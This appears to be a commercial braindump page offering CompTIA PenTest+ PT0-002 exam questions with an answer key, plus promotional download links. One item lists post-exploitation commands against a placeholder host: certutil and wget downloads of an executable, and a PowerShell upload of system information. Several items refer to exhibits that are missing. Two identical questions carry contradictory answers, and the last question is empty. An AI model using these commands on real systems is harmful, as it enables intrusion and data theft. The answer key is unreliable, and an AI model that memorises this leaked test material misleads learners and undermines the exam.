PT0-002 Tested & Approved CompTIA PenTest+ Study Materials
Validate your Skills with Updated CompTIA PenTest+ Exam Questions & Answers and Test Engine
The CompTIA PT0-002 certification exam covers various topics related to penetration testing, such as planning and scoping, information gathering and vulnerability identification, attacks and exploitation, post-exploitation techniques, reporting, and communication skills. The PT0-002 exam also tests the candidate's knowledge of legal and regulatory compliance requirements, standards, and ethical considerations. The CompTIA PenTest+ certification exam is vendor-neutral, which means it is not limited to a particular software or hardware vendor. Successful completion of the exam indicates that the candidate possesses the skills and knowledge required to conduct a successful penetration test.
The CompTIA PenTest+ certification exam, also known as PT0-002, is a reputable certification offered by CompTIA to validate your skills and knowledge in penetration testing. The CompTIA PenTest+ certification demonstrates that you can identify and exploit vulnerabilities to protect the organization's network and data from cyber-attacks. PT0-002 is designed for professionals who want to pursue a career in penetration testing or for those who want to enhance their skills in cybersecurity.
NEW QUESTION # 147
A penetration tester is testing a new API for the company's existing services and is preparing the following script:
Which of the following would the test discover?
- A. Listening web servers in a domain
- B. Supported HTTP methods
- C. Default web configurations
- D. Open web ports on a host
Answer: B
Explanation:
The script is using the requests library to send an OPTIONS request to the API endpoint, which returns a list of supported HTTP methods for that resource. This can help the penetration tester to identify potential attack vectors or vulnerabilities based on the methods allowed.
NEW QUESTION # 148
A penetration tester needs to perform a vulnerability scan against a web server. Which of the following tools is the tester MOST likely to choose?
- A. Ethercap
- B. Cain and Abel
- C. Nmap
- D. Nikto
Answer: D
Explanation:
https://hackertarget.com/nikto-website-scanner/
NEW QUESTION # 149
A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:
Which of the following tools will help the tester prepare an attack for this scenario?
- A. Burp Suite and DIRB
- B. Nmap and OWASP ZAP
- C. Hydra and crunch
- D. Netcat and cURL
Answer: A
NEW QUESTION # 150
Which of the following is a regulatory compliance standard that focuses on user privacy by implementing the right to be forgotten?
- A. GDPR
- B. NIST SP 800-53
- C. ISO 27001
Answer: A
Explanation:
GDPR is a regulatory compliance standard that focuses on user privacy by implementing the right to be forgotten. GDPR stands for General Data Protection Regulation, and it is a law that applies to the European Union and the United Kingdom. GDPR gives individuals the right to request their personal data be deleted by data controllers and processors under certain circumstances, such as when the data is no longer necessary, when the consent is withdrawn, or when the data was unlawfully processed. GDPR also imposes other obligations and rights related to data protection, such as data minimization, data portability, data breach notification, and consent management. The other options are not regulatory compliance standards that focus on user privacy by implementing the right to be forgotten. NIST SP 800-53 is a set of security and privacy controls for federal information systems and organizations in the United States. ISO 27001 is an international standard that specifies the requirements for an information security management system.
NEW QUESTION # 151
A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?
- A. powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/upload.php', 'systeminfo.txt')
- B. certutil -urlcache -split -f http://192.168.2.124/windows-binaries/accesschk64.exe
- C. wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe
- D. schtasks /query /fo LIST /v | find /I "Next Run Time:"
Answer: B
Explanation:
https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while
https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk
NEW QUESTION # 152
A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity. Which of the following is the MOST important action to take before starting this type of assessment?
- A. Determine if the failover environment relies on resources not owned by the client.
- B. Ensure the client has signed the SOW.
- C. Establish communication and escalation procedures with the client.
- D. Verify the client has granted network access to the hot site.
Answer: B
NEW QUESTION # 153
A client would like to have a penetration test performed that leverages a continuously updated TTPs framework and covers a wide variety of enterprise systems and networks. Which of the following methodologies should be used to BEST meet the client's expectations?
- A. OWASP Top 10
- B. NIST Cybersecurity Framework
- C. MITRE ATT&CK framework
- D. The Diamond Model of Intrusion Analysis
Answer: C
NEW QUESTION # 154
An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems.
Which of the following is the penetration tester trying to accomplish?
- A. Identify all the vulnerabilities in the environment.
- B. Maintain confidentiality of the findings.
- C. Uncover potential criminal activity based on the evidence gathered.
- D. Limit invasiveness based on scope.
Answer: D
NEW QUESTION # 155
A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:
* Have a full TCP connection
* Send a "hello" payload
* Wait for a response
* Send a string of characters longer than 16 bytes
Which of the following approaches would BEST support the objective?
- A. Perform a credentialed scan with Nessus.
- B. Run nmap -Pn -sV -script vuln <IP address>.
- C. Employ an OpenVAS simple scan against the TCP port of the host.
- D. Create a script in the Lua language and use it with NSE.
Answer: D
NEW QUESTION # 156
Which of the following BEST describes why a client would hold a lessons-learned meeting with the penetration-testing team?
- A. To determine any processes that failed to meet expectations during the assessment
- B. To provide feedback on the report structure and recommend improvements
- C. To ensure the penetration-testing team destroys all company data that was gathered during the test
- D. To discuss the findings and dispute any false positives
Answer: A
NEW QUESTION # 157
During the reconnaissance phase, a penetration tester obtains the following output:
Reply from 192.168.1.23: bytes=32 time<54ms TTL=128
Reply from 192.168.1.23: bytes=32 time<53ms TTL=128
Reply from 192.168.1.23: bytes=32 time<60ms TTL=128
Reply from 192.168.1.23: bytes=32 time<51ms TTL=128
Which of the following operating systems is MOST likely installed on the host?
- A. macOS
- B. Linux
- C. NetBSD
- D. Windows
Answer: D
Explanation:
The output shows the result of a ping command, which sends packets to a host and receives replies. The ping command can be used to determine whether a host is alive and reachable on the network. One piece of information that the ping command displays is the Time to Live (TTL) value, which indicates how many hops a packet can travel before it is discarded. The TTL value can also be used to guess the operating system of the host, because different operating systems use different default TTL values. In this case, the TTL value is 128, which is the default value for Windows operating systems. Linux and macOS have a default TTL value of 64, while NetBSD has a default TTL value of 255.
NEW QUESTION # 158
A penetration tester performs the following command:
curl -I --http2 https://www.comptia.org
Which of the following snippets of output will the tester MOST likely receive?
- A. Option B
- B. Option C
- C. Option A
- D. Option D
Answer: C
NEW QUESTION # 159
A penetration tester is testing input validation on a search form that was discovered on a website. Which of the following characters is the BEST option to test the website for vulnerabilities?
- A. Single quote
- B. Double dash
- C. Comma
- D. Semicolon
Answer: A
Explanation:
A single quote (') is a common character used to test for SQL injection vulnerabilities, which occur when user input is directly passed to a database query. A single quote can terminate a string literal and allow an attacker to inject malicious SQL commands. For example, if the search form uses the query SELECT * FROM products WHERE name LIKE '%user_input%', then entering a single quote as user input would result in an error or unexpected behavior.
NEW QUESTION # 160
A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:
Which of the following combinations of tools would the penetration tester use to exploit this script?
- A. Burp Suite and DIRB
- B. Nmap and OWASP ZAP
- C. Hydra and crunch
- D. Netcat and cURL
Answer: D
NEW QUESTION # 161
Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)
- A. Injection flaws
- B. Ransomware attacks
- C. Buffer overflows
- D. Race-condition attacks
- E. Cross-site scripting
- F. Zero-day attacks
Answer: A,E
Explanation:
A01-Injection
A02-Broken Authentication
A03-Sensitive Data Exposure
A04-XXE
A05-Broken Access Control
A06-Security Misconfiguration
A07-XSS
A08-Insecure Deserialization
A09-Using Components with Known Vulnerabilities
A10-Insufficient Logging & Monitoring
NEW QUESTION # 162
A consulting company is completing the ROE during scoping.
Which of the following should be included in the ROE?
- A. Liability
- B. Cost of the assessment
- C. Report distribution
- D. Testing restrictions
Answer: C
NEW QUESTION # 163
The following line-numbered Python code snippet is being used in reconnaissance:
Which of the following line numbers from the script MOST likely contributed to the script triggering a "probable port scan" alert in the organization's IDS?
- A. Line 07
- B. Line 02
- C. Line 01
- D. Line 08
Answer: D
NEW QUESTION # 164
A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client's IP address. The tester later discovered the SOC had used sinkholing on the penetration tester's IP address. Which of the following BEST describes what happened?
- A. The penetration tester had incorrect contact information
- B. The penetration tester was testing the wrong assets
- C. The planning process failed to ensure all teams were notified
- D. The client was not ready for the assessment to start
Answer: C
Explanation:
Sinkholing is a technique used by security teams to redirect malicious or unwanted network traffic to a controlled destination, such as a black hole or a honeypot. This can help prevent or mitigate attacks, analyze malware behavior, or isolate infected hosts. If the SOC used sinkholing on the penetration tester's IP address, it means that they detected the tester's activity and blocked it from reaching the client's network. This indicates that the planning process failed to ensure all teams were notified about the penetration testing engagement, which could have avoided this situation.
NEW QUESTION # 165
PT0-002 [Jan-2024 Newly Released] PT0-002 Exam Questions For You To Pass: https://www.validvce.com/PT0-002-exam-collection.html
For your comfort, ValidVCE provides you the convenience of free CompTIA PenTest+ braindumps demo: https://drive.google.com/open?id=1MtlbPEAcIobYBKCDieTUZnEEit-KC9xl
